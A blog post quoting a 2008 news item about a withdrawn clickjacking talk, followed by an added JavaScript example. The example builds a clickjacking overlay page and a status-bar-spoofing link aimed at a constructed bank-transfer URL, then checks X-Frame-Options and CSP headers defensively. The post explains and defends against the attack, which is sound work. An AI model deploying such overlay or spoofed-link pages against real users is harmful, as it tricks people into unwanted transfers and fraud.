"In another event for the "internet is broken" files, two prominent
security researchers have pulled a scheduled talk that was to
demonstrate critical holes affecting anyone who uses a browser to surf
the web.
Jeremiah Grossman and Robert "RSnake" Hansen say they planned to
demonstrate serious "clickjacking" vulnerabilities involving every
major browser during a presentation scheduled for September 24 at
OWASP’s AppSec 2008 Conference
in New York. They canceled their talk at the request of Adobe, one of
the developers whose software is vulnerable to the weakness, they say.
The pair planned to disclose flaws in the architecture of all of
today’s web browsers that allow malicious websites to control the links
visitors click on. Once lured to a fraudulent address, a user may think
he’s clicking on a link that leads to Google – when in fact it takes
him to a money transfer page, a banner ad that’s part of a click-fraud
scheme, or any other destination the attacker chooses.
The technique can also forge the address that appears on a status
bar at the bottom of a web browser, so even those who are careful to
check the referring address before clicking can be tricked, Grossman says."
Jeremiah has also posted an entry on his blog worth checking out.
Read more at theregister: http://www.theregister.co.uk/2008/09/16/critical_vulnerability_demo_pulled/
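The quoted article describes two tricks in words only: a page that makes the visitor's click land somewhere other than the link they think they are clicking, and a link whose status-bar address is not where the click goes. The block below is an added example, not the researchers' withheld demo and not code from the article: it models both tricks as generated HTML and adds the check a defender would run on a page's response headers to see whether the page can be framed at all (X-Frame-Options and CSP frame-ancestors both arrived in browsers after this post). All URLs, origins and header values in it are constructed for illustration.

```javascript
// Added example (not from the article or the researchers' talk). Models the
// click-hijacking overlay and the status-bar spoof described above, plus a
// defender-side framing check. All URLs and headers below are constructed.

// 1. Clickjacking overlay: the visitor sees only the decoy button, but an
//    invisible, higher-z-index iframe holding the target page sits over it,
//    so the click is delivered to whatever the target renders at that spot.
function buildClickjackPage(targetUrl, decoyLabel) {
  return [
    '<!doctype html><html><body>',
    '<button style="position:absolute;top:120px;left:120px;width:200px;height:48px">' +
      decoyLabel + '</button>',
    // opacity:0 hides the frame; z-index:2 puts it above the decoy so it gets the click
    '<iframe src="' + targetUrl + '" style="position:absolute;top:0;left:0;' +
      'width:900px;height:700px;border:0;opacity:0;z-index:2"></iframe>',
    '</body></html>',
  ].join('\n');
}

// 2. Status-bar spoof: hovering shows displayedUrl, but mousedown fires before
//    the click navigates and rewrites href, so the browser follows realUrl.
function buildStatusBarSpoofLink(displayedUrl, realUrl, text) {
  return '<a href="' + displayedUrl + '" onmousedown="this.href=\'' + realUrl +
    '\'">' + text + '</a>';
}

// 3. Defender's check: given a page's response headers, its own origin and a
//    would-be embedder's origin, decide whether a browser would allow framing.
//    Simplified model of current browser behaviour: a CSP frame-ancestors
//    directive wins over X-Frame-Options; DENY and SAMEORIGIN are honoured; a
//    missing or unrecognised value (including the obsolete ALLOW-FROM) leaves
//    the page frameable, which is the clickjacking-vulnerable state.
function parseFrameAncestors(csp) {
  for (const directive of csp.split(';')) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0].toLowerCase() === 'frame-ancestors') return parts.slice(1);
  }
  return null; // policy present but no frame-ancestors directive
}

function sourceMatches(src, pageOrigin, embedder) {
  const s = src.toLowerCase();
  const e = embedder.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return e === pageOrigin.toLowerCase();
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return e.startsWith(s + '//'); // scheme source
  // host source, optionally with a scheme and a leading "*." wildcard
  let scheme = null;
  let hostPattern = s;
  const m = s.match(/^([a-z][a-z0-9+.-]*):\/\/(.+)$/);
  if (m) { scheme = m[1]; hostPattern = m[2]; }
  const u = new URL(e);
  if (scheme && u.protocol !== scheme + ':') return false;
  if (hostPattern.startsWith('*.')) return u.host.endsWith(hostPattern.slice(1));
  return u.host === hostPattern;
}

function framingAllowed(headers, pageOrigin, embedderOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  if (h['content-security-policy']) {
    const sources = parseFrameAncestors(h['content-security-policy']);
    if (sources) return sources.some((s) => sourceMatches(s, pageOrigin, embedderOrigin));
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return embedderOrigin.toLowerCase() === pageOrigin.toLowerCase();
  return true; // no header, or a value browsers ignore: the page can be framed
}

// Demo run on constructed values.
const TARGET = 'https://bank.example/transfer?to=attacker&amount=1000'; // constructed
console.log(buildClickjackPage(TARGET, 'Claim your prize'));
console.log(buildStatusBarSpoofLink('https://www.google.com/', TARGET, 'Google'));
console.log('no headers, frameable by anyone:',
  framingAllowed({}, 'https://bank.example', 'https://evil.example'));
console.log('SAMEORIGIN, evil embedder:',
  framingAllowed({ 'X-Frame-Options': 'SAMEORIGIN' }, 'https://bank.example', 'https://evil.example'));
```

Running the script prints the two attacker pages and then the framing verdicts; the header check is the part worth reusing, for example over the headers of every top-level response captured by a proxy, to list pages that neither header protects.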